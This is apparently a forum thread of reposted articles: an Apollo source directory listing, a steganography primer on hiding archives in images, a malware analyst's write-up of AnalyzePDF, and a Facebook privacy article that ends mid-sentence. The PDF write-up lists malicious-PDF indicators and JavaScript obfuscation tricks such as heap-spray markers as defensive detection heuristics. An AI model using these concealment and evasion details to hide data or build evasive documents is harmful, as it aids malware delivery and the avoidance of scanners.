[TD]R30.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 87K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]R31.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 48K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]R60_62.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 64K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RCS-CSM_DAP_EXECUTIVE_PROGRAMS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 15K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RCS-CSM_DIGITAL_AUTOPILOT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]164K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REENTRY_CONTROL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]242K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RESTARTS_ROUTINE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 52K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RESTART_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 81K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RT8_OP_CODES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 56K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]S-BAND_ANTENNA_FOR_CM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 24K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SERVICER207.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]121K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SERVICE_ROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 42K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SINGLE_PRECISION_SUBROUTINES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 12K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]STABLE_ORBIT.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 68K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]STAR_TABLES.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 27K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SXTMARK.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]105K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]SYSTEM_TEST_STANDARD_LEAD_INS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 22K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]T4RUPT_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]232K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TAGS_FOR_RELATIVE_SETLOC.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 66K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TIME_OF_FREE_FALL.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]118K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TPI_SEARCH.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 91K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCDAPS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]124K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCEXECUTIVE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 46K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCINITIALIZE.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 69K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCMASSPROP.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 37K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCRESTARTS.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 45K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCROLLDAP.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right]101K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]TVCSTROKETEST.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 42K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]UPDATE_PROGRAM.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 95K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]WAITLIST.agc.html[/TD] [TD=align: right]27-Jul-2009 19:49 [/TD] [TD=align: right] 86K[/TD] [TD] [/TD] [/TR] [/TABLE] Sursa: Index of /apollo/listings/Comanche055
  5. Nytro
    Steganography: The Art of Hiding Information What with all of the spying and whatnot, we all need a private space for those things we do want to hide. Cryptography or encryption can be used to hide content, but it does not hide data from a third party, it makes the data unreadable by a third party. And then there is steganography, the science, or rather, the art of hiding data. You can, for example hide files in an image, like so: The command cat reads the image file (in this case technocracy.jpg) and the compressed directory littlesecrets.tar.gz and then concatenates image and compressed file together in a new file, makeithardertobespiedon.jpg (use any name you like). To get your files back, simply uncompress the makeithardertobespiedon image file. Obviously, combining the two, compressing an encrypted directory and concatenating it in an image file, makes it even harder to be spied on. You can do this yourself, using your chosen encryption scheme, then the above, or you can use a tool. If and when you use a tool, I recommend researching local laws on encryption and its exportation before use. Tools Steghide for example, is a steganography program that is able to hide data in various kinds of image- and audio-files. The color- respectivly sample-frequencies are not changed thus making the embedding resistant against first-order statistical tests. Note that the steghide code is hosted on sourceforge, which was bought by Dice Holdings in 2012. I used the command line for steghide when I experimented with it, but there are graphical front-ends. I haven’t tried those. More tools can be found here (comparison table). My requirements would be: FOSS licensed (preferably GNU licensed) cross-platform (must run on GNU/Linux) support of additional cryptography Detectable? In 2001 Niels Provos searched for images that might contain hidden messages using stegdetect and stegbreak. Like said, we are making it harder. A lot harder. But … For every clever method and tool being developed to hide information in multimedia data, an equal number of clever methods and tools are being developed to detect and reveal its secrets. ~ Cyber Warfare: Steganography vs. Steganalysis (pdf) More on steganography The Black Chamber Detecting Steganographic Content on the Internet (pdf) Computer Forensics, Cybercrime and Steganography Resources: Steganography & Data Hiding – Links & Whitepapers (latest entry from 2008) An Overview of Steganography for the Computer Forensics Examiner Cyber Warfare: Steganography vs. Steganalysis (pdf) Sursa: https://lilithlela.cyberguerrilla.org/?p=6620
  6. Nytro
    [h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h] [h=2]What is that thing they call a PDF?[/h] The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (SIO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal. The PDF has become a defacto for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing and but since they're so common they're still a reliable means for a delivery method by malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (to be fair, the sandboxed versions and other security controls these days have helped significantly) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports [h=3]What does a PDF consist of?[/h] In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word in it) we can see a better idea of the contents we'd expect to see: [h=2]What else is out there?[/h] Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may be an overlap of others out there but that's mainly because the results of our research produced similar results or our minds think alike...I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intentions aren't to downplay them and/or their ability to analyze PDF's but rather helping to show reasons I ended up doing what I did. [h=4]pdfid/pdf-parser[/h] Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capability/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as the (-e) which display extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations. During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone. I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '/r' or '/n' behind it, it doesn't seem to count it. I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages/ values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131) There were times when the number of characters after the last '%%EOF' were incorrect Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g - cbf76a32de0738fea7073b3d4b3f1d60) : [h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the files internals. Originally, this tool didn't look match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another users work. [h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but it's power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process. [h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the files structure - which is great if you want to include that into an overall report but again this requires the user to interpret the parsed data [h=4]pdfcop[/h] Pdfcop is part of the Origami framework. There're some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file our right away if there was an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up meaning their Xref tables are first read in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it already was flagged bad but I feel like that's too much of tunnel vision for me. I personally prefer to know more than less...especially if I want to do trending/stats/analytics. [h=2]So why create something new?[/h] While there are a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of those above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there's wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs? [h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger or take them one at a time through one of the above mentioned tools? They're all fine work flows but what if you discover something unique or come across it enough times to create a signature/rule out of so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis one offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too great in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.< I felt it was better to use the characteristics of a malicious file (either known or observed from combinations of within malicious files) to eval what would indicate a malicious file. Instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: A single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF are a high indicator that it's malicious, there're still legitimate reasons for JavaScript to be within a PDF (e.g. - to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires). [h=3]Gathering Stats[/h] At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDF's out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDF's to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note : Spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing). Be aware that you're going to come across files that someone may mark as good but it actually shows signs of badness... always interesting to detect these types of things during testing! [h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this: Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in ""3.4.1, 'File Header' of Appendix H - ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right in the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either: The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration. [*]Get rid of duplicates (based on SHA256 hash) for both files in the same category (clean vs. dirty) then again via the entire data set afterwards to make sure there're no duplicates between the clean and dirty sets. [*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach. [*]Run scans for low hanging fruit/know badness with local A/V||YARA Now that we have a more accurate data set classified: [*]Are all PDFs classified as benign really benign? [*]Are all PDFs classified as malicious really malicious? [h=3]Stats[/h] Files analyzed (no duplicates found between clean & dirty): [TABLE=width: 50%] [TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR] [TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR] [TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR] [TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR] [/TABLE] I've collected more than enough data to put together a paper or presentation but I feel that's been played out already so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies. [h=4]Ah-Ha's[/h] None of the clean files had incorrect file headers/versions There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of it's entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things. The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse? None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid Clean files never had '/Colors > 2^24' above 0 while some dirty files did Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file '/JBIG2Decode' was never above '0' in any clean file '/Launch' wasn't used much in either of the data sets but still more common in the dirty ones Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check) Single page PDF's have a higher likelihood of being malicious - no duh '/OpenAction' is far more common in malicious files [h=4]YARA signatures[/h] I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified. Clean data set: Dirty data set: Signatures that triggered across both data sets: Cool... so we know we have some rules that work well and others that might need adjusting, but they still help! [h=4]What to look for[/h] So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps? Header In addition to being after the first 8 bytes I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version .. however, the above mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers or digging deeper we can correlate the PDF's features/elements to the version number and flag on mismatches. Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together. [h=3]File Identification[/h] In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as: [h=3]Wrap pdfinfo[/h] Through my testing I found this tool to be more reliable in some areas as opposed to pdfid such as: Determining if there're any Xref errors produced when trying to read the PDF Look for any unterminated hex strings etc. Detecting EOF errors [h=3]Wrap pdfid[/h] Read the header. *pdfid will show exactly what's there and not try to convert it* _attempt_ to determine the number of pages Look for object/stream mismatches Not only look for JavaScript but also determine if there's an abnormally high amount Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.) Look for data after EOF Calculate a few different entropy scores Next, perform some automagical checks and hold on to the results for later calculations. [h=3]Scan with YARA[/h] While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There're many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase it's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about: If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed the calculation process starts. This is two phase - Anything noted from pdfino and pdfid are evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing...but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has it's weighted value parsed from the rule and added to the overall score. This helps bump up a files score or immediately flag it as suspicious if you have a rule you really want to alert on. So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640 : [h=3]Download[/h] I've had this code for quite a while and haven't gotten around to writing up a post to release it with but after reading a former coworkers blog post last night I realized it was time to just write something up and get this out there as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDF's when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to is and get back a "yes it's ok -or- no, sending it for analysis". AnalyzePDF can be downloaded on my github [h=2]Further Reading[/h] Research papers (one | two | three) [PDF] PDFTricks PDF Overview Posted by hiddenillusion at 9:44 PM Sursa: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
  7. Nytro
    Didn't Read Facebook's Fine Print? Here's Exactly What It Says The Huffington Post | By Amanda Scherker So, like every other one of the world's 1.28 billion monthly active Facebook users, you blindly agreed to Facebook's Terms and Conditions without reading the fine print. You entrusted your photo albums, private messages and relationships to a website without reading its policies. And you do the same with every other site ... sound about right? In your defense, Carnegie Mellon researchers determined that it would take the average American 76 work days to read all the privacy policies they agreed to each year. So you're not avoiding the reading out of laziness; it's literally an act of job preservation. So here are the Cliffs Notes of what you agreed to when you and Facebook entered into this contract. Which, by the way, began as soon as you signed up: Nothing you do on Facebook is private. Repeat: Nothing you do on Facebook is private. Note the rather vague use of the word "infer," which Oxford Dictionary defines as "Deduce or conclude (information) from evidence and reasoning rather than from explicit statements." That includes some things you haven't even done yet. Facebook has even begun studying messages that you type but end up deciding not to post. A recent study by a Facebook data analyst looked at habits of 3.9 million English-speaking Facebook users to analyze how different users "self-censor" on Facebook. They measured the frequency of "aborted" messages or status posts, i.e., posts that were deleted before they ever were published. They studied this because "[Facebook] loses value from the lack of content generation," and they hoped to determine how to limit this kind of self-censorship in the future. While a Facebook spokesman told Slate that the network is not monitoring the actual substance of these messages, Facebook was able to determine when characters were typed, and whether they were posted within ten minutes of being typed. Even if you leave the network, not all your information does. Your Facebook footprint doesn't necessarily disappear if you deactivate your account. According to the site's Statement of Rights and Responsibilities, if your videos or photos have been shared by other users, they will remain visible on the site after you deactivate your account, and are subject to that user's privacy settings. Your information lets Facebook sell the power of your profile to brands and companies. This means that Facebook is being paid for supplying your endorsement (which you indicate by liking a page) to brands or companies. You can even find out how much your data is worth to Facebook by using the FBME application from Disconnect, Inc. And a report from The Center For Digital Democracy shows marketing companies are taking note, creating algorithms for determining key social media "influencers." The report found that many marketers have identified multicultural youth users as key influencers, and have targeted those demographics with heavier social media marketing. You're also giving Facebook the ability to track your web surfing anytime you're logged into the site. This announcement came in a recent post from Facebook. Facebook notes that other websites do the same thing. But that accounts for an insane amount of potential data, especially given the growth of Facebook mobile use. On average, Facebook mobile users check the site 14 times a day on their devices. Facebook also uses strategic partnerships to track your purchases in real life. Last year, Facebook started partnering with data broker firms. Data brokers earn their money by selling the power of your consumer habits and monitoring your online and offline spending. Facebook's partnership allows them to measure the correlation between the ads you see on Facebook and the purchases you make in-store -- and determine whether you're actually buying in real life the things you're seeing digitally while using Facebook. Two of Facebook's partners, Datalogix and Acxiom -- one of the oldest data brokers and a partner of Huffington Post's parent company AOL, Inc., -- were among the nine data brokers the Federal Trade Commission analyzed in a recent in-depth study. The study found that data brokers "collect consumer data from numerous sources, largely without consumers' knowledge" and "store billions of data elements." Acxiom has a database of about 3,000 data segments for nearly every U.S. consumer. Brokers share this information among "multiple layers of data brokers providing data to each other," and then analyze the date to make "potentially sensitive inferences" about the consumer. These sensitive data points could range from health specifics, like high cholesterol, to broader demographic categories -- like the so-called "Urban Scramble," which includes a "high concentration of Latinos and African Americans with low incomes" or the so-called "Rural Everlasting," which includes single men and women over the age of 66 with “low educational attainment and low net worths." Some other examples of data points the FTC noted: Presence of Elderly Parent Presence of Children in Household Birth Dates of Each Child in House Single Parent with Children Ethnic and Religious Affiliations Home Size Market Value Date of Move Gambling - State Lotteries Affluent Baby Boomer Type of Credit Cards Date of Last Travel Purchase Buying Activity Working-Class Mom Buying Channel Preference (e.g., Internet, Mail, Phone) Average Days Between Orders Last Online Order Date Last Offline Order Date Smoker in Household Allergy Sufferer Weight Loss & Supplements Expectant Parent The data collection is difficult to skirt. One Time Magazine reporter went to great lengths to hide her pregnancy from big data; she said her husband ended up looking like a criminal when he went to a drugstore and tried to purchase enough Amazon gift cards to buy a stroller on the website. This kind of ultra-specific marketing also can become eerie. Take the case of Mike Seay, who the LA Times reported received an OfficeMax marketing letter addressed to "Mike Seay, Daughter Killed in Car Crash." OfficeMax said that the information came from a third-party broker, but did not specify which one. Facebook uses all this outside information to target ads to you. This past June, Facebook announced that it would start using data from users' web browsing history to serve targeted advertisements as such: Of course, targeting ads is hardly a new phenomenon; Nielsen started gathering information about radio audiences back in the '30s. But because Facebook has so much information on every user, the kinds of demographics they make available to advertisers are more comprehensive. These are some of the ad target categories that Facebook allows: For example, a company could specify its audience, said Facebook, "to target people who recently moved and are engaged or in a relationship and in the industries of Accounting and Finance." When Facebook introduced its ad targeting, it said, "When we ask people about our ads, one of the top things they tell us is that they want to see ads that are more relevant to their interests." But that explanation doesn't really tell the whole story. While some users may not mind being shown targeted ads to help them pick out a new TV, this example brushes over the full scope of items being marketed to you based on your data. For instance, according to a report from the Center for Digital Democracy, financial service companies have taken to Facebook for "data mining, targeting, and influencing consumers and their networks of friends," and some companies are developing "new leads for their loan and refinance offers" based on users' Facebook behavior. And the finance world is not a small amount of Facebook's advertising platform: According to a Business Insider investigation, Visa, American Express, Capitol One and CitiBank are among the top 35 biggest advertisers on Facebook. When Facebook describes its newly implemented changes, it doesn't seem as eager to discuss the financial plans it might be helping the companies sell you. So who really benefits from these highly targeted ads? For one, Facebook itself. Facebook's ad revenue grew 82 percent from 2013 to the first quarter of 2014, totaling $2.27 billion. Joseph Turow, a professor at the University of Pennsylvania’s Annenberg School for Communication, told the New York Times that this new user tracking is making Facebook one of the fastest-growing advertising companies on the Internet. "It's more likely to help Facebook than you," he said. If you're not very keen on helping Facebook generate more profitable ads at the price of your privacy, Facebook suggests you choose the "x" out option on individual ads. This won't change the data being gathered about your interests, but it should help prevent an influx of credit card ads from popping up on your Facebook. If you want your targeted ads to stop completely, Facebook recommends you use the industry-standard opt-out program from Digital Advertising Alliance. However, those two recommendations have been dismissed by privacy advocates like Jeff Chester, executive director of the Center for Digital Democracy, who called them "a political smokescreen to enable Facebook to engage in more data gathering." FTC chairwoman Edith Ramirez has also urged the wider digital advertising community to create a "more persistent method" of opting out that would give consumers more control. According to a Consumer Reports poll, 85 percent of online consumers oppose Internet ad tracking. Facebook has been rolling out location services that effectively turn mobile phones into location tracking devices. What's next when it come to information gathering by 